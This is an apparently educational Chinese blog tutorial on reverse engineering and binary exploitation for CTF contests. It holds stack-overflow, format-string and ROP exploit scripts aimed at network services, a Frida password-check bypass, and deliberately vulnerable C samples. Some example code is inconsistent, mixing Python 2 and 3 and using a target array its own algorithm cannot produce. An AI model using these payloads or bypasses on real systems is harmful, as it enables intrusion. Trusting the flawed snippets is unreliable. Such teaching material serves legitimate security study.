118_逆向工程与二进制分析：从汇编到漏洞挖掘的实战技能详解

安全风信子

发布于 2025-11-16 16:02:13

550

文章被收录于专栏：AI SPPECHAI SPPECH

引言

逆向工程是CTF（Capture The Flag）竞赛中的核心技能之一，特别是在二进制挑战中。通过逆向工程，参赛者可以理解程序的内部逻辑，发现潜在的漏洞，从而成功解题。本文将从基础概念开始，逐步深入讲解逆向工程与二进制分析的核心技术和实战方法。

1.1 逆向工程在CTF中的重要性

在CTF竞赛中，逆向工程主要应用于以下场景：

二进制分析：分析未知程序的功能和逻辑
漏洞挖掘：发现程序中的安全漏洞
恶意代码分析：识别和分析恶意软件的行为
协议逆向：理解未知网络协议的格式和行为
软件破解：绕过软件的保护机制

1.2 学习目标

通过本文的学习，读者将能够：

理解逆向工程的基本概念和原理
掌握汇编语言的基础语法和常见指令
学习使用逆向工程工具分析二进制程序
掌握基本的漏洞挖掘方法
解决CTF竞赛中的二进制挑战

2. 逆向工程基础

2.1 逆向工程的基本概念

逆向工程是指通过分析目标系统的结构、功能和行为，推导出其设计原理和实现细节的过程。在软件领域，逆向工程通常包括反汇编、反编译、代码分析等步骤。

2.2 常见的二进制文件格式

在逆向工程中，我们会遇到各种不同的二进制文件格式。以下是一些常见的格式：

ELF（Executable and Linkable Format）：Linux/Unix系统中最常用的可执行文件格式
PE（Portable Executable）：Windows系统中使用的可执行文件格式
Mach-O（Mach Object）：macOS/iOS系统中使用的可执行文件格式
COFF（Common Object File Format）：一种通用的目标文件格式

2.3 汇编语言基础

汇编语言是一种低级编程语言，它直接对应于机器语言指令。在逆向工程中，我们经常需要阅读和理解汇编代码。以下是一些基础的汇编概念。

2.3.1 x86/x64汇编基础

x86和x64是最常见的CPU架构。以下是一些基本的x86/x64汇编指令：

数据传输指令：MOV、PUSH、POP、XCHG等
算术运算指令：ADD、SUB、MUL、DIV等
逻辑运算指令：AND、OR、XOR、NOT等
控制流指令：JMP、JZ、JNZ、CMP等
栈操作指令：PUSH、POP、CALL、RET等

2.3.2 寄存器

寄存器是CPU中的高速存储单元，用于临时存储数据和地址。在x86架构中，主要的寄存器包括：

通用寄存器：EAX、EBX、ECX、EDX、ESI、EDI、EBP、ESP
段寄存器：CS、DS、SS、ES、FS、GS
标志寄存器：EFLAGS
指令指针寄存器：EIP

在x64架构中，这些寄存器被扩展到64位，名称也相应地改为RAX、RBX等。

2.4 内存管理基础

内存管理是理解程序行为的重要部分。在逆向工程中，我们需要了解：

内存分段：代码段、数据段、堆、栈等
内存保护机制：可读、可写、可执行权限
内存分配与释放：堆内存的管理方式
栈帧结构：函数调用时的栈布局

3. 逆向工程工具

3.1 反汇编工具

反汇编工具用于将二进制代码转换为汇编代码。以下是一些常用的反汇编工具。

3.1.1 IDA Pro

IDA Pro是最强大的商业逆向工程工具之一，它支持多种处理器架构和文件格式，提供交互式反汇编环境。

3.1.2 Ghidra

Ghidra是由美国国家安全局（NSA）开发的免费开源逆向工程工具，功能强大，支持多种处理器架构和文件格式。

3.1.3 objdump

objdump是GNU Binutils工具集中的一个命令行工具，用于显示目标文件的信息，包括反汇编代码。

# 反汇编可执行文件
objdump -d executable

# 显示文件头信息
objdump -f executable

# 显示所有段信息
objdump -h executable

3.1.4 readelf

readelf是专门用于分析ELF格式文件的工具，可以显示ELF文件的各种信息。

# 显示所有信息
readelf -a executable

# 显示段信息
readelf -S executable

# 显示符号表
readelf -s executable

3.2 调试工具

调试工具用于在程序运行时观察和控制程序的行为。以下是一些常用的调试工具。

3.2.1 GDB

GDB是GNU项目的调试器，支持多种编程语言和平台。

# 启动调试器
gdb executable

# 在GDB中运行程序
run

# 设置断点
break function_name
break *address

# 继续执行
continue

# 单步执行
step
next

# 查看变量
print variable

# 查看内存
x/nfu address

3.2.2 WinDbg

WinDbg是Windows平台上的调试器，功能强大，特别适合分析Windows程序。

3.2.3 Radare2

Radare2是一个开源的逆向工程框架，集成了反汇编、调试、分析等功能。

# 启动Radare2
r2 executable

# 分析程序
aaa

# 查看函数列表
 afl

# 反汇编函数
pdf @ function_name

# 启动调试
ood

# 设置断点
 db address

# 运行程序
 dc

3.3 静态分析工具

静态分析工具用于在不运行程序的情况下分析程序的结构和行为。以下是一些常用的静态分析工具。

3.3.1 Binwalk

Binwalk是一个用于分析、提取和逆向工程固件映像的工具。

# 基本扫描
binwalk firmware.bin

# 提取文件
binwalk -e firmware.bin

3.3.2 strings

strings是一个简单但有用的工具，用于从二进制文件中提取ASCII字符串。

# 提取字符串
strings executable

# 提取长度大于8的字符串
strings -n 8 executable

# 显示字符串在文件中的偏移量
strings -t x executable

3.3.3 Hexdump

Hexdump用于以十六进制和ASCII格式显示文件内容。

# 基本显示
hexdump file.bin

# 更友好的格式
hexdump -C file.bin

3.4 动态分析工具

动态分析工具用于在程序运行时观察程序的行为。以下是一些常用的动态分析工具。

3.4.1 strace/ltrace

strace用于跟踪系统调用，ltrace用于跟踪库函数调用。

# 跟踪系统调用
strace executable

# 跟踪库函数调用
ltrace executable

# 保存输出到文件
strace -o output.txt executable

3.4.2 Valgrind

Valgrind是一个内存调试和内存泄漏检测工具。

# 使用Memcheck工具检测内存错误
valgrind --leak-check=full ./executable

# 检测内存访问错误
valgrind --tool=memcheck ./executable

3.4.3 Frida

Frida是一个动态代码插桩工具，可以在不修改程序的情况下注入代码。

// 示例Frida脚本
Java.perform(function() {
    var MainActivity = Java.use("com.example.MainActivity");
    MainActivity.checkPassword.implementation = function(password) {
        console.log("输入的密码: " + password);
        return true;  // 绕过密码检查
    };
});

# 运行Frida脚本
frida -U -f com.example.app -l script.js --no-pause

4. 反汇编与代码分析

4.1 反汇编技术

反汇编是逆向工程的第一步，它将二进制代码转换为汇编代码。以下是一些反汇编技术。

4.1.1 线性扫描反汇编

线性扫描反汇编从程序的入口点开始，顺序地将每个字节解释为指令，直到遇到不可执行的内存区域。这种方法简单但容易将数据错误地解释为指令。

4.1.2 递归下降反汇编

递归下降反汇编从程序的入口点开始，跟踪所有可能的执行路径，只将确实是指令的字节解释为指令。这种方法更准确，但在处理间接跳转时可能会遇到困难。

4.2 函数识别与分析

在分析二进制程序时，识别和理解函数是非常重要的。以下是一些函数识别和分析的方法。

4.2.1 函数入口点识别

函数入口点通常具有以下特征：

函数序言（Function Prologue）：通常包括保存栈基址、分配栈空间等操作
函数序言的常见模式：push ebp; mov ebp, esp; sub esp, xxx
导入/导出表中的函数名称
函数调用指令（如call）的目标地址

4.2.2 函数参数分析

函数参数的传递方式取决于调用约定。常见的调用约定包括：

cdecl：参数从右到左压入栈，调用者负责清理栈
stdcall：参数从右到左压入栈，被调用者负责清理栈
fastcall：前两个参数通过寄存器传递，其余参数通过栈传递
x64调用约定：前四个参数通过RCX、RDX、R8、R9寄存器传递，其余参数通过栈传递

4.2.3 函数行为分析

分析函数的行为可以从以下几个方面入手：

输入参数和返回值的类型和含义
函数内部的控制流结构
函数调用的其他函数
函数对全局变量和内存的访问

4.3 控制流分析

控制流分析是理解程序逻辑的重要方法。以下是一些控制流分析技术。

4.3.1 控制流图（CFG）

控制流图是表示程序控制流的图形化工具，它使用节点表示基本块（连续的指令序列，只有一个入口和一个出口），使用边表示控制流的转移。

4.3.2 基本块分析

基本块是控制流图中的节点，它具有以下特征：

只有一个入口点和一个出口点
一旦执行了基本块的第一个指令，就会执行该块的所有指令
控制流只能从基本块的最后一个指令转移出去

4.3.3 循环识别

识别程序中的循环结构对于理解程序行为非常重要。常见的循环结构包括：

do-while循环：先执行循环体，再判断条件
while循环：先判断条件，再执行循环体
for循环：具有初始化、条件判断和迭代步骤的循环

4.4 数据结构识别

识别程序中使用的数据结构是逆向工程的重要任务。以下是一些数据结构识别方法。

4.4.1 静态数据识别

静态数据通常存储在数据段中，可以通过以下特征识别：

字符串常量：连续的ASCII或Unicode字符
数组：具有固定大小和元素类型的数据集合
结构体：多个不同类型的数据元素的组合
常量表：程序中使用的常量值集合

4.4.2 动态数据识别

动态数据通常在运行时分配在堆或栈中，可以通过以下方法识别：

内存分配和释放函数的调用（如malloc/free）
数据访问模式（如数组索引、结构体成员访问）
数据初始化和操作代码

5. 二进制漏洞分析

5.1 栈溢出漏洞

栈溢出是最常见的二进制漏洞之一，它发生在程序向栈中写入的数据超过了预分配的空间时。

5.1.1 栈溢出的原理

当函数被调用时，系统会在栈上为函数创建一个栈帧，包括返回地址、参数、局部变量等。如果程序没有正确验证用户输入的长度，攻击者可以构造特殊的输入，覆盖栈中的返回地址，从而控制程序的执行流程。

5.1.2 栈溢出的利用

栈溢出的利用通常包括以下步骤：

确定缓冲区的大小和位置
构造攻击载荷，包括填充字节和恶意代码或跳转地址
将攻击载荷发送给程序
程序执行到被覆盖的返回地址时，跳转到攻击者控制的代码

# 栈溢出攻击示例
import socket

# 目标地址和端口
target = "192.168.1.100"
port = 9999

# 创建socket连接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))

# 构造攻击载荷
# 假设缓冲区大小为2000字节，返回地址位于缓冲区之后
buffer = "A" * 2000  # 填充字节
ret_address = "\xef\xbe\xad\xde"  # 恶意返回地址
payload = buffer + ret_address + "C" * (10000 - 2000 - 4)  # 完整载荷

# 发送攻击载荷
s.send("TRUN /.:/" + payload + "\r\n")

# 关闭连接
s.close()

5.2 堆溢出漏洞

堆溢出发生在程序向堆中分配的内存区域写入的数据超过了分配的空间时。

5.2.1 堆溢出的原理

堆是程序运行时动态分配的内存区域。如果程序没有正确验证写入堆缓冲区的数据长度，攻击者可以覆盖相邻的堆块元数据，从而控制程序的执行流程。

5.2.2 堆溢出的利用

堆溢出的利用通常比较复杂，因为它涉及到堆管理机制的细节。常见的堆溢出利用技术包括：

覆盖堆块元数据：修改堆块的大小、前后指针等
利用空闲链表：通过操作空闲链表来控制内存分配
劫持函数指针：覆盖存储在堆中的函数指针

// 堆溢出漏洞示例
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *user_input) {
    char *buffer = (char *)malloc(256);  // 分配256字节的堆内存
    strcpy(buffer, user_input);  // 没有检查长度，存在堆溢出漏洞
    printf("Input: %s\n", buffer);
    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

5.3 格式化字符串漏洞

格式化字符串漏洞发生在程序使用用户输入作为格式化字符串参数时。

5.3.1 格式化字符串漏洞的原理

格式化函数（如printf、sprintf等）使用格式化字符串来确定输出的格式。如果用户能够控制这个格式化字符串，就可以读取栈中的敏感信息，甚至修改内存中的数据。

5.3.2 格式化字符串漏洞的利用

格式化字符串漏洞的利用通常包括以下几种方式：

信息泄露：使用%x、%p等格式化说明符读取栈中的数据
内存写入：使用%n格式化说明符向指定地址写入数据
代码执行：通过修改关键内存位置（如函数指针）来执行恶意代码

# 格式化字符串漏洞利用示例
import socket

# 目标地址和端口
target = "192.168.1.100"
port = 9999

# 创建socket连接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))

# 信息泄露：读取栈中的数据
leak_payload = "%x.%x.%x.%x.%x.%x.%x.%x\n"
s.send(leak_payload.encode())
response = s.recv(1024)
print("栈数据:", response.decode())

# 内存写入：将值写入指定地址
target_address = "\x40\x12\x34\x56"  # 要写入的地址
write_value = 1337  # 要写入的值
# 构造格式化字符串，使用%n将写入的字节数保存到target_address
exploit_payload = target_address + "%" + str(write_value - 4) + "x%n\n"
s.send(exploit_payload.encode())

# 关闭连接
s.close()

5.4 整数溢出漏洞

整数溢出发生在计算结果超出了整数类型的表示范围时。

5.4.1 整数溢出的原理

每种整数类型都有一个确定的表示范围。当算术运算的结果超出这个范围时，就会发生整数溢出，导致计算结果错误。

5.4.2 整数溢出的利用

整数溢出通常与其他漏洞结合使用，例如：

缓冲区溢出：整数溢出导致缓冲区大小计算错误
权限提升：整数溢出导致权限检查失效
内存破坏：整数溢出导致内存访问越界

// 整数溢出漏洞示例
#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(int count) {
    // 如果count很大，count * sizeof(int)可能会溢出
    int *buffer = (int *)malloc(count * sizeof(int));
    // 使用buffer...
    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <count>\n", argv[0]);
        return 1;
    }
    int count = atoi(argv[1]);
    vulnerable_function(count);
    return 0;
}

5.5 Use-After-Free漏洞

Use-After-Free漏洞发生在程序继续使用已经释放的内存时。

5.5.1 Use-After-Free漏洞的原理

当程序释放内存后，如果没有将相应的指针设置为NULL，并且在之后继续使用这个指针，就会发生Use-After-Free漏洞。攻击者可以通过控制被释放内存的重新分配来执行恶意代码。

5.5.2 Use-After-Free漏洞的利用

Use-After-Free漏洞的利用通常包括以下步骤：

触发程序释放某个内存块
重新分配这块内存，并填充恶意数据
程序继续使用原来的指针，访问到攻击者控制的数据

# Use-After-Free漏洞利用示例（简化版）
import sys

# 假设我们有一个目标程序，其中存在UAF漏洞
# 这个脚本模拟漏洞利用过程

def exploit():
    # 1. 分配第一个对象
    obj1 = allocate_object()
    
    # 2. 分配第二个对象，大小与第一个相同
    obj2 = allocate_object()
    
    # 3. 释放第一个对象
    free_object(obj1)
    
    # 4. 分配第三个对象，应该重用第一个对象的内存
    # 我们可以在这个对象中植入恶意数据
    payload = create_malicious_payload()
    obj3 = allocate_with_payload(payload)
    
    # 5. 程序可能会继续使用obj1指针，访问到我们控制的数据
    # 这可能导致代码执行
    
    print("漏洞利用完成")

# 实际的漏洞利用需要根据目标程序的具体情况进行调整
def allocate_object():
    print("分配对象")
    return object()

def free_object(obj):
    print("释放对象")

def allocate_with_payload(payload):
    print("使用恶意载荷分配对象")
    return object()

def create_malicious_payload():
    print("创建恶意载荷")
    return "malicious_code"

if __name__ == "__main__":
    exploit()

6. 逆向工程实战技巧

6.1 符号恢复

在分析没有调试符号的二进制文件时，恢复函数和变量的名称和含义是非常重要的。

6.1.1 函数名称推断

函数名称可以通过以下方式推断：

函数的功能和行为
函数调用的其他已知函数
函数的参数和返回值类型
字符串引用和常量使用

6.1.2 变量名称推断

变量名称可以通过以下方式推断：

变量的使用方式（如循环变量、计数器、标志位等）
变量的类型和大小
变量的初始化和修改方式
变量与其他变量或函数的关系

6.2 代码反编译

代码反编译是将汇编代码转换为更高级的语言（如C）的过程。

6.2.1 类型推断

类型推断是反编译的重要步骤，它可以通过以下方式进行：

变量的使用方式（如指针解引用、数组索引等）
函数调用的参数和返回值
算术和逻辑运算
内存访问模式

6.2.2 结构体恢复

结构体恢复是反编译中的一个挑战，它可以通过以下方式进行：

内存访问模式（如[eax+8]可能是结构体的第二个成员）
初始化和赋值代码
函数参数和返回值
结构体成员的使用方式

6.3 字符串加密分析

在许多程序中，字符串会被加密或混淆以防止静态分析。

6.3.1 字符串解密技术

解密加密字符串的方法包括：

动态调试：在程序运行时捕获解密后的字符串
代码模拟：分析解密算法并手动或自动模拟执行
补丁应用：修改程序以在解密后输出字符串

# 字符串解密示例
import idaapi
import idautils

# 假设我们有一个简单的XOR解密函数
def decrypt_string(encrypted_bytes, key):
    decrypted = []
    for i, b in enumerate(encrypted_bytes):
        decrypted.append(b ^ key[i % len(key)])
    return bytes(decrypted)

# 在IDA Pro中查找和解密字符串
def find_and_decrypt_strings():
    # 遍历所有数据引用
    for seg_ea in idautils.Segments():
        if idaapi.segtype(seg_ea) == idaapi.SEG_DATA:
            # 遍历数据段中的每个地址
            for ea in idautils.Heads(seg_ea, idaapi.seg_end(seg_ea)):
                # 检查是否有XOR指令引用了这个地址
                refs = list(idautils.XrefsTo(ea))
                for ref in refs:
                    # 分析引用该地址的函数
                    func_ea = idaapi.get_func(ref.frm).start_ea
                    # 这里可以添加更复杂的分析逻辑来确定解密算法和密钥
                    print(f"可能的加密字符串在 {hex(ea)}，被函数 {hex(func_ea)} 引用")

6.4 控制流混淆分析

控制流混淆是一种常见的代码保护技术，用于使逆向工程更加困难。

6.4.1 常见的控制流混淆技术

常见的控制流混淆技术包括：

虚假控制流：添加永远不会执行的代码路径
循环混淆：将简单的控制流转换为复杂的循环结构
跳转表：使用间接跳转替代直接跳转
函数拆分：将一个函数拆分成多个小函数

6.4.2 控制流去混淆技术

控制流去混淆的方法包括：

静态分析：分析控制流图，识别不可能的路径
动态分析：跟踪实际执行的路径
符号执行：使用符号执行技术分析所有可能的执行路径

# 简单的控制流分析示例
import networkx as nx
import matplotlib.pyplot as plt

def build_cfg(basic_blocks):
    """构建控制流图"""
    cfg = nx.DiGraph()
    
    # 添加节点
    for block in basic_blocks:
        cfg.add_node(block.name)
    
    # 添加边
    for block in basic_blocks:
        for successor in block.successors:
            cfg.add_edge(block.name, successor)
    
    return cfg

def analyze_cfg(cfg):
    """分析控制流图"""
    # 检查是否有无法到达的节点
    reachable_nodes = set(nx.dfs_preorder_nodes(cfg, source="entry"))
    all_nodes = set(cfg.nodes)
    unreachable_nodes = all_nodes - reachable_nodes
    
    if unreachable_nodes:
        print(f"发现无法到达的节点: {unreachable_nodes}")
    
    # 检查是否有循环
    cycles = list(nx.simple_cycles(cfg))
    if cycles:
        print(f"发现循环: {cycles}")
    
    # 可视化控制流图
    nx.draw(cfg, with_labels=True)
    plt.savefig("cfg.png")
    print("控制流图已保存为 cfg.png")

# 示例基本块类
class BasicBlock:
    def __init__(self, name):
        self.name = name
        self.successors = []

# 使用示例
def main():
    # 创建一些基本块
    entry = BasicBlock("entry")
    block1 = BasicBlock("block1")
    block2 = BasicBlock("block2")
    block3 = BasicBlock("block3")
    exit_block = BasicBlock("exit")
    
    # 设置控制流
    entry.successors = ["block1"]
    block1.successors = ["block2", "block3"]
    block2.successors = ["exit"]
    block3.successors = ["exit"]
    
    # 这个块是无法到达的（混淆技术）
    unreachable = BasicBlock("unreachable")
    unreachable.successors = ["exit"]
    
    # 构建控制流图
    cfg = build_cfg([entry, block1, block2, block3, exit_block, unreachable])
    
    # 分析控制流图
    analyze_cfg(cfg)

if __name__ == "__main__":
    main()

7. CTF实战案例分析

7.1 案例一：简单的栈溢出挑战

在这个案例中，我们将分析一个包含栈溢出漏洞的程序，并展示如何利用这个漏洞获取shell。

7.1.1 程序分析

首先，我们需要分析程序的结构和漏洞点。

# 使用file命令查看文件类型
file vulnerable_program

# 使用checksec查看安全保护机制
checksec vulnerable_program

# 使用strings提取字符串
strings vulnerable_program

# 使用objdump反汇编
objdump -d vulnerable_program > disassembly.txt

通过分析，我们可能会发现以下信息：

程序是一个32位或64位的可执行文件
程序可能禁用了ASLR、DEP等安全机制
程序包含一个有栈溢出漏洞的函数，例如使用了不安全的gets函数
程序中可能有一个system函数调用或可以跳转到的/bin/sh字符串

7.1.2 漏洞利用

基于分析结果，我们可以构造一个攻击载荷。

# 栈溢出漏洞利用脚本
from pwn import *

# 创建进程或连接到远程服务器
# p = process('./vulnerable_program')  # 本地调试
p = remote('challenges.example.com', 1337)  # 远程连接

# 确定偏移量
# 可以使用cyclic生成独特的模式，然后根据崩溃时的EIP/RIP值计算偏移量
# offset = 120  # 假设我们已经找到了偏移量

# 获取system函数地址和/bin/sh字符串地址
# 可以通过ROPgadget、objdump等工具获取
# system_addr = 0x08048420
# bin_sh_addr = 0x0804a024

# 构造ROP链
# rop_chain = p32(system_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)

# 构造攻击载荷
# payload = b'A' * offset + rop_chain

# 发送攻击载荷
# p.sendline(payload)

# 获取shell
# p.interactive()

7.2 案例二：格式化字符串挑战

在这个案例中，我们将分析一个包含格式化字符串漏洞的程序，并展示如何利用这个漏洞读取敏感信息和修改内存。

7.2.1 程序分析

首先，我们需要分析程序，找到格式化字符串漏洞的位置。

# 使用GDB调试程序
gdb ./format_string_program

# 查看程序的基本信息
info functions
info variables

# 设置断点
break main

# 运行程序
run

# 分析程序执行流程和漏洞点

通过分析，我们可能会发现：

程序直接使用用户输入作为格式化字符串参数
程序中有一些敏感信息（如flag）存储在内存中
程序可能有一些需要修改的变量来获取flag

7.2.2 漏洞利用

基于分析结果，我们可以构造格式化字符串攻击载荷。

# 格式化字符串漏洞利用脚本
from pwn import *

# 创建进程或连接到远程服务器
p = process('./format_string_program')
# p = remote('challenges.example.com', 1337)

# 步骤1：确定格式化字符串在栈中的位置
# 发送%x.%x.%x...来查找格式化字符串的位置
p.sendline(b'%p.%p.%p.%p.%p.%p.%p.%p')
response = p.recvline()
print("响应:", response)

# 假设格式化字符串在栈中的第6个位置
format_pos = 6

# 步骤2：读取敏感信息（如flag）
# 假设flag存储在0x0804a040地址
target_addr = 0x0804a040
payload = p32(target_addr) + b'|%' + str(format_pos).encode() + b'$s||'
p.sendline(payload)
response = p.recvline()
print("Flag响应:", response)

# 步骤3：修改内存中的值
# 假设我们需要将0x0804a044地址的值修改为0x1337
target_addr = 0x0804a044
desired_value = 0x1337

# 构造写入4个字节的格式化字符串
# 这里使用%n来写入
payload = p32(target_addr) + b'%' + str(desired_value - 4).encode() + b'x%' + str(format_pos).encode() + b'$n'
p.sendline(payload)

# 验证修改是否成功
p.sendline(b'%p')
response = p.recvline()
print("修改后响应:", response)

# 获取flag
p.sendline(b'get_flag')
flag = p.recvline()
print("Flag:", flag)

p.close()

7.3 案例三：逆向工程保护算法

在这个案例中，我们将分析一个实现了某种保护算法的程序，并展示如何逆向工程这个算法来获取flag。

7.3.1 程序分析

首先，我们需要分析程序的保护算法。

# 使用IDA Pro或Ghidra分析程序
# 找到关键函数，如main函数和验证函数

# 使用GDB动态调试程序，观察算法的执行过程
gdb ./protected_program

# 设置断点在关键函数处
break validate_password

# 运行程序并观察执行过程
run test_password

通过分析，我们可能会发现：

程序有一个密码验证函数，它实现了某种加密或哈希算法
程序将用户输入的密码与存储的正确密码进行比较
正确的密码或其哈希值可能存储在程序中或由算法动态生成

7.3.2 算法逆向与破解

基于分析结果，我们可以编写一个脚本来逆向算法并生成正确的密码。

# 算法逆向脚本

# 假设我们通过逆向工程发现了以下验证算法：
# 1. 将输入密码的每个字符转换为ASCII值
# 2. 对每个ASCII值进行如下变换：val = (val << 2) | (val >> 6)
# 3. 将变换后的值与预定义的数组进行比较
def reverse_algorithm(target_array):
    """逆向算法，生成正确的密码"""
    password = []
    
    for target_val in target_array:
        # 逆向变换：val = (val >> 2) | (val << 6)
        # 我们需要尝试所有可能的字符
        for c in range(32, 127):  # 可打印ASCII字符范围
            # 应用正向变换
            transformed = ((c << 2) | (c >> 6)) & 0xff  # 确保是8位
            if transformed == target_val:
                password.append(chr(c))
                break
    
    return ''.join(password)

# 假设我们从程序中提取的目标数组
target_array = [0x63, 0x25, 0x5a, 0x6a, 0x3c, 0x1d, 0x44, 0x29, 0x6e, 0x2f]

# 生成正确的密码
correct_password = reverse_algorithm(target_array)
print(f"正确的密码是: {correct_password}")

# 现在可以使用这个密码来获取flag
# import subprocess
# result = subprocess.run(['./protected_program', correct_password], capture_output=True, text=True)
# print(result.stdout)